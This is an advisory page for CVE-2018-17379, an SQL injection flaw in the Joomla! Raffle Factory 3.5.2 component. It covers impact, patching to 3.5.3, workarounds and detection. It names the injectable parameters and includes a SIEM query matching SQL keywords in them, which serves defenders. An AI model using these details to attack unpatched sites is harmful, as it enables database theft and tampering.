Login Sign Up

CVE-2018-17379

9.8 CRITICAL
SQL Injection

📋 TL;DR

This SQL injection vulnerability in Raffle Factory 3.5.2 for Joomla! allows attackers to execute arbitrary SQL commands via the filter_order_Dir or filter_order parameters. This affects all Joomla! installations using the vulnerable Raffle Factory component. Attackers can potentially access, modify, or delete database content.

💻 Affected Systems

Products:
  • Joomla! Raffle Factory component
Versions: 3.5.2
Operating Systems: All platforms running Joomla!
Default Config Vulnerable: ⚠️ Yes
Notes: Affects Joomla! installations with Raffle Factory 3.5.2 component enabled.

📦 What is this software?

Raffle Factory by Thephpfactory

View all CVEs affecting Raffle Factory →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete database compromise leading to data theft, data destruction, or full system takeover via SQL injection to remote code execution chaining.

🟠

Likely Case

Database information disclosure, privilege escalation, or data manipulation affecting raffle entries and user data.

🟢

If Mitigated

Limited impact with proper input validation and parameterized queries preventing SQL injection.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Public exploit code available on Exploit-DB and Packet Storm Security.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.5.3 or later

Vendor Advisory: https://extensions.joomla.org/extension/raffle-factory/

Restart Required: No

Instructions:

1. Update Raffle Factory component to version 3.5.3 or later via Joomla! Extension Manager. 2. Verify update completes successfully. 3. Test component functionality.

🔧 Temporary Workarounds

Input Validation Filter

all

Implement strict input validation for filter_order_Dir and filter_order parameters

Modify component code to validate/sanitize these parameters before SQL query execution

Web Application Firewall Rule

all

Block SQL injection patterns targeting Raffle Factory parameters

Add WAF rule to block requests containing SQL injection patterns in filter_order_Dir or filter_order parameters

🧯 If You Can't Patch

  • Disable or remove Raffle Factory component from Joomla! installation
  • Implement network segmentation and restrict access to affected systems

🔍 How to Verify

Check if Vulnerable:

Check Joomla! Extension Manager for Raffle Factory version 3.5.2

Check Version:

Check via Joomla! admin panel: Extensions → Manage → Manage

Verify Fix Applied:

Confirm Raffle Factory version is 3.5.3 or later in Extension Manager

📡 Detection & Monitoring

Log Indicators:

  • SQL error messages in Joomla! logs
  • Unusual database queries from web server
  • Multiple failed parameter validation attempts

Network Indicators:

  • HTTP requests with SQL injection patterns in filter_order_Dir or filter_order parameters
  • Unusual database connection patterns from web server

SIEM Query:

web.url:*/raffle-factory* AND (web.param:*filter_order_Dir* OR web.param:*filter_order*) AND (web.param:*UNION* OR web.param:*SELECT* OR web.param:*INSERT* OR web.param:*DELETE*)

📊 Metadata

CVE ID: CVE-2018-17379
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-89
Published: September 28, 2018
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2018-17379, you might also want to check these:

CVE-2024-8522 10.0

This vulnerability allows unauthenticated attackers to perform SQL injection attacks on WordPress si...

Same vulnerability type (CWE-89)
CVE-2024-13152 10.0

This SQL injection vulnerability in BSS Software's Mobuy Online Machinery Monitoring Panel allows at...

Same vulnerability type (CWE-89)
CVE-2021-42311 10.0

CVE-2021-42311 is a critical SQL injection vulnerability in Microsoft Defender for IoT that allows r...

Same vulnerability type (CWE-89)